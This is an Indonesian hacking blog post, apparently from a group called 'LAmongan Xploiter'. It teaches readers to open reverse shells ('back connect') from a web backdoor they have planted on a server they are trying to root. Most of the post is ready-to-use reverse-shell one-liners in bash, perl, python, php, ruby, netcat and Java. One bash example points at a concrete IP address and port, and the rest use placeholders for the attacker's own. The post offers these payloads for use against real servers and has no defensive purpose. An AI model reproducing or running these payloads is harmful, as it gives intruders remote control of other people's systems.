bypass back connect

bypass back connect
back connect selain lewat backdoor shell






ketika kalian manu me root server menggunakan back connect di tools yg ada di backdoor web  tapi gagal , nah tenang aja masih ada cara bypass nya kok hehehe , langsung saja ea




1.Masuk ke shell Kalian..
2.pilih kode yg mau kamu gunakan
3.ganti IpMu Dan PortMu ganti pake ip dan port kalian contoh saya mau memakai bash :

bash -i >& /dev/tcp/134.21.11.2/4949 0>&1

4.masukan kode tersebut di dalam command shell
5.buka terminal mu.. and jreng jreng.. backconnect sukses...

commmand back connect nya di bawah ini
 bash -i >& /dev/tcp/IpMu/PortMu 0>&1





perl -e 'use 
Socket;$i="IpMu";$p=PortMU;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh
 -i");};'





python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IpMu",PortMu));os.dup2(s.fileno(),0);
 os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'





php -r '$sock=fsockopen("IpMu",PortMu);exec("/bin/sh -i <&3 >&3 2>&3");'





ruby -rsocket -e'f=TCPSocket.open("IpMu",PortMu).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'





nc -e /bin/sh IpMu PortMu





r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IpMu/PortMu;cat 
<&5 | while read line; do \$line 2>&5 >&5; done"] 
as String[])

p.waitFor() 
coopyright by Mr.cakil , pray for u friends semoga mendapatkan hal yang terbaik buat u :)   terimakasih dulu dah sering beri materi di grup LAX   -LAmongan Xploiter
Share This :